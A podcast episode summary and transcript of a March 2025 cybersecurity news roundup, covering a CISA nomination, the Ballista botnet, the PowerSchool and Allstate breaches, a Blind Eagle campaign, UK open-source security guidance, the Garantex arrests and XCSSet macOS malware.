New CISA head, Ballista botnet, PowerSchool breach report - Cybersecurity Headlines

Summary6 min read

Cyber Security Headlines – CISO Series Episode Summary
Release Date: March 12, 2025
Hosted by: Rich Stroffelino

1. Sean Planke Nominated as New CISA Head

In a significant move for U.S. cybersecurity leadership, Sean Planke has been nominated by President Trump to head the Cybersecurity and Infrastructure Security Agency (CISA). As reported by Rich Stroffelino at 00:06, Planke brings a wealth of experience to the role, having previously served as the Chief Information Officer (CIO) of the U.S. Navy and as the White House's Director of Cyber Policy during the first Trump administration. Additionally, he was the Principal Deputy Assistant Secretary for the Energy Department's Office of Cybersecurity, Energy Security, and Emergency Response from 2019 to 2020. Stroffelino notes, “The nomination now goes before the Senate Homeland Security Committee and is not expected to face significant pushback” (00:06), suggesting a smooth confirmation process ahead.

2. Ballista Botnet Exploits TP-Link Devices

A new threat has emerged targeting TP-Link Archer AX21 routers through the Ballista botnet. According to a report from the CATO Control team discussed at 00:06, threat actors are exploiting a high-severity command injection vulnerability to execute malicious code. Although the flaw was first identified in April 2023, active exploitation was observed in January 2025. The attackers utilize a shell script to deploy malware across various system architectures, enabling remote code execution and potential denial-of-service attacks. Notably, the malware is designed to self-erase after execution to evade detection and includes mechanisms to propagate to additional devices.

Researchers from Census highlighted that Ballista has compromised over 6,000 devices across countries including Brazil, Poland, the UK, Bulgaria, and Turkey. An intriguing development in newer Ballista variants is the shift from hard-coded IP addresses to Tor network domains, indicating ongoing evolution and active development by the threat actors.

3. PowerSchool Breach Report Released

PowerSchool, a leading education software provider, has published its breach report following a 2024 cyber-attack. Collaboration with CrowdStrike revealed that the company experienced initial breaches in August and September 2024, preceding the major December breach. At 00:06, Rich Stroffelino summarizes, “The December attack exfiltrated teachers and students' data using compromised credentials.” However, there is uncertainty regarding whether the same threat actors were responsible for the earlier incidents.

Key findings include:

Data Exfiltration: Personal information of teachers and students was accessed.
Malicious Activity: No evidence was found that attackers accessed other company databases or moved laterally within PowerSchool’s network.
Ransom Demands: As of January 2025, there is no evidence that stolen data was published post-ransom payment.

PowerSchool has yet to disclose the total number of students affected by these breaches.

4. Allstate Faces Lawsuit Over Data Breaches

New York's Attorney General has filed a lawsuit against Allstate and its subsidiaries due to data breaches in 2020 and 2021. As detailed at 00:06, the breaches exploited an auto insurance quoting tool from National General (acquired by Allstate in 2021), which exposed nearly 200,000 driver's license numbers. The legal complaint highlights that the tool displayed driver's license numbers in plain text, a vulnerability that was not addressed promptly.

Post the initial breach, Allstate reportedly:

Regulatory Notification: Informed relevant authorities.
Issue Resolution: Fixed the vulnerability quickly.
Support Measures: Offered credit monitoring services to affected individuals.

The lawsuit underscores the repeated failure to secure sensitive data, prompting legal action from the state to hold the company accountable for its cybersecurity practices.

5. Blind Eagle APT Group Targets Colombian Organizations

Blind Eagle, also known as APTC 36, is reportedly orchestrating a new campaign against government institutions and organizations in Colombia since November 2024. Check Point Research detailed this campaign at 00:06, revealing that the group disseminates malicious URL files designed to trigger WebDAV requests. These requests can initiate the download of second-stage payloads or execute other malicious activities upon specific interactions.

Key tactics employed by Blind Eagle include:

Malware Distribution: Primarily through consumer services like Google Drive and Dropbox, with a recent expansion into BitBucket and GitHub for payload hosting.
Evasion Techniques: Utilizing methods that make it harder for traditional security measures to detect and block their activities.

The ongoing campaign highlights the persistent threat posed by advanced persistent threat (APT) groups targeting governmental and critical infrastructure sectors.

6. UK Urges Strengthening of Open Source Supply Chain Security

The United Kingdom's Department for Science, Innovation and Technology (DCIT) has released a report addressing vulnerabilities within the open-source software (OSS) supply chain. As discussed at 00:06, the report identifies several key weaknesses:

Lack of Industry-Specific Practices: No standardized procedures tailored to different industries.
Trustworthiness Assessment: Absence of formal processes for evaluating the reliability of OSS components.
Dominance of Large Tech Companies: Overreliance on major tech entities poses risks to the diversity and security of open-source projects.

DCIT Recommendations include:

Internal OSS Policies: Organizations should develop comprehensive policies outlining criteria for assessing OSS components.
Software Bill of Materials (SBOMs): Creating detailed inventories of software components used within products.
Community Engagement: Actively participating and contributing to the open-source community to foster security and trust.

These measures aim to enhance the overall security posture of the open-source ecosystem and mitigate risks associated with supply chain vulnerabilities.

7. Arrests Made in Connection with Gurantex Crypto Exchange

In a crackdown on illicit cryptocurrency activities, the U.S. Department of Justice (DOJ) unsealed an indictment against Gurantex's alleged founders, Alexander Miraserda and Alexei Beskiokov, on March 7. Gurantex had been sanctioned by the U.S. government in 2022 for facilitating money laundering for criminal organizations. Concurrently, German and Finnish law enforcement agencies seized servers associated with the exchange.

Key developments include:

Arrests: Indian officials apprehended Beskiokov over the weekend, as reported at 00:06.
Charges: Beskiokov is accused of being the technical administrator responsible for maintaining Gurantex’s critical infrastructure.

This operation underscores the international efforts to dismantle crypto exchanges involved in financial crimes and enforce regulatory compliance within the digital currency landscape.

8. New Xcode Malware Variant Unveiled by Microsoft

XCSSet, a malware identified in 2022 targeting Xcode projects on macOS, has evolved with a new variant featuring significant enhancements. At 00:06, Rich Stroffelino details Microsoft's findings on the updated malware:

Modular Infrastructure: The new variant is more adaptable and scalable.
Encoded Payloads: Utilizes encoding to obscure malicious components.
Improved Error Handling: Enhances the malware's resilience against detection and analysis.
Scripting and Legitimate Binaries: Incorporates scripting languages and Unix commands to blend with legitimate system operations, reducing its detection profile.
Obfuscated Module Names: Makes static analysis more challenging by disguising the names of its modules.
Persistence Mechanisms: Implements three distinct methods to ensure payload execution whenever a new shell session is initiated.

Microsoft has responsibly disclosed these details to Apple prior to public release and has provided comprehensive information on individual modules in the show notes, aiding security professionals in mitigating this threat.

Conclusion

This episode of Cyber Security Headlines by CISO Series, hosted by Rich Stroffelino, provided a comprehensive overview of the latest developments in the cybersecurity landscape as of March 12, 2025. From significant leadership changes within federal cyber agencies to emerging threats like the Ballista botnet and advanced malware variants, the episode underscored the dynamic and evolving nature of cyber threats. Additionally, the discussions highlighted ongoing efforts to strengthen cybersecurity practices across industries, legal actions against negligent companies, and international collaborations to combat cybercrime. For those keen on staying informed about critical cybersecurity issues, this episode offers valuable insights and actionable information.

For more detailed stories and updates, visit cisoseries.com.

Loading summary

Transcript4 lines

[00:00]
A
From the CISO series, it's Cybersecurity Headlines.
[00:07]
B
These are the cybersecurity headlines for Wednesday, March 12, 2025. I'm Rich Stroffelino. Sean Planky nominated to head CISA According to a list of nominations sent to Congress, President Trump tapped Sean Planke to lead the U.S. cyber agency. Planke previously served as the CIO of the US Navy, as the White House's director of Cyber Policy during the first Trump administration, and as the principal DEP assistant secretary for the Energy Department's Office of Cybersecurity, Energy Security and emergency response in 2019 and 2020. The nomination now goes before the Senate Homeland Security Committee and is not expected to face significant pushback. Ballista botnet hits TP link devices A new report from the CATO Control team details how threat actors are exploiting a high severity command injection vulnerability to execute code on TP link Archer AX21 routers to ultimately deploy the botnet. The flaw isn't new. The first evidence of exploitation dates back to April 2023. The researchers saw the campaign using the flaw in January 2025. The attackers used a shell script to execute a malware binary across various system architectures, which opens the door to remote code execution or denial of service, the researchers noted. The malware can erase itself once execution begins to cover its tracks, while also spreading to other Newer Ballista variants use Tor network domains rather than hard coded IP addresses, indicating it's under active development. Researchers by Census found that Ballista infected over 6,000 devices across Brazil, Poland, the UK, Bulgaria and Turkey. PowerSchool publishes breach report the education software giant released CrowdStrike's investigation into its December 2024 breach. This showed signs that the company was initially breached in August 2024 and then again in September prior to the December breach. And it's not clear if the same threat actor was responsible for either of the two prior breaches. The December attack exfiltrated teachers and students data using compromised credentials, but researchers did not see evidence that the attackers accessed other company databases. There was also no evidence the attackers moved laterally in their network or downstream to any school systems directly. As of January 2025, CrowdStrike found no evidence that threat actors published any data from the breach after being paid a ransom. PowerSchool has not confirmed how many students were impacted by the attacks. All states sued for back to back breaches. The New York State Attorney General's office filed a lawsuit against the insurance company and several of its subsidiaries, accusing them of poor cybersecurity practices that led to data breaches in 2020 and 2021. Both attacks exploited an auto insurance quoting tool from the company National General, which Allstate acquired in 2021, exposing almost 200,000 driver's license numbers. The lawsuit said the tool populated driver's license numbers in plain text, something not fixed. After the first breach, Allstate says it notified regulators and fixed the issue promptly, offering credit monitoring services to those impact and now, thanks to today's episode sponsor Vanta, do you know the status of your compliance controls right now? Like right now, we know that real time visibility is critical for security. When it comes to our GRC programs, we rely on point in time checks. But more than 9,000 companies have continuous visibility into their controls with Vanta. Vanta brings automation to evidence collection across 35 frameworks like SoC2 and ISO 27001. They also centralize key workflows like policies, access reviews and reporting, and helps you get security questionnaires done five times faster with AI. Now that's a new way to GRC. Get started at vanta.com headlines that's V A N T A dot com headlines blind eagle flies High with URL files Check Point Research released an advisory about a new campaign targeting government institutions and organizations in Colombia since November 2024. These attacks are attributed to the group Blind Eagle, also known as APTC 36 for those that don't like cool names. This campaign distributes malicious URL files which trigger a webdav request when interacting with it in a specific way that could start a second stage payload download or execute other malicious actions. The group largely distributes malware through consumer services like Google Drive or Dropbox, but the researchers found them expanding to using BitBucket and GitHub for payload hosting. UK calls for improvements to open source supply chain security A new report from the UK's Department for Science, Innovation and Technology, or DCIT, outlined weaknesses in the open source supply chain, citing a lack of industry specific practices, a lack of formal process for judging component trustworthiness, and dominant influence of large tech companies as points of concern. As best practice recommendations, organizations should create internal OSS policy that details the criteria for evaluating the trustworthiness and maturity of OSS components, develop software bill of Materials or SBOMs for their products, and actively engage and contribute to the open source community. Suspected Gurantex founder arrested the crypto exchange Gurantex was sanctioned by the US government in 2022 for facilitating money laundering by criminal organizations. On March 7, the US Department of Justice unsealed an indictment against its alleged founders Alexander Miraserda and Alexei Beskiokov. At the same time, German had Finnish law enforcement seized servers used by the service. Sources speaking to Krebs on security say that Indian officials apprehended Breskyokov over the weekend. The DOJ charges Beskyokov as the technical administrator maintaining the exchange's critical infrastructure. Xcode malware learns new tricks Researchers discovered the XCSSet malware in 2022, which infects Xcode projects on macOS and runs while the project is being built. Microsoft released details on a new variant with a number of improvements, including a modular infrastructure, encoded payloads, and improved error handling. It also uses scripting languages, Unix commands, and legitimate binaries to further lower its profile. The variant also obfuscates module names to make static analysis less effective, and includes three persistent approaches to launch a payload whenever a new shell session is initiated. Microsoft shared full details about this with Apple ahead of its publication, and published details on individual modules, which we've linked to in our show notes. Remember to register for this week's Super Cyber Friday, which is all about hacking competitive grc. We're sick of talking about GRC as a cost center or just a checkbox, so we're spending an hour discussing how GRC can be a competitive advantage. If you want more details, head on over to our events page@cisoseries.com to to join us this Friday at 1pm Eastern for the discussion. You can join in our chat, play a few fun games, and even win some sweet CISO series swag. We hope to see you there. Reporting for the CISO series, I'm Rich Stroffolino, reminding you to have a super sparkly day.
[07:43]
A
Cybersecurity headlines are available every weekday. Head to cisoseries.com for the full stories. Behind the headlines.
[07:54]
B
Boom boom boom.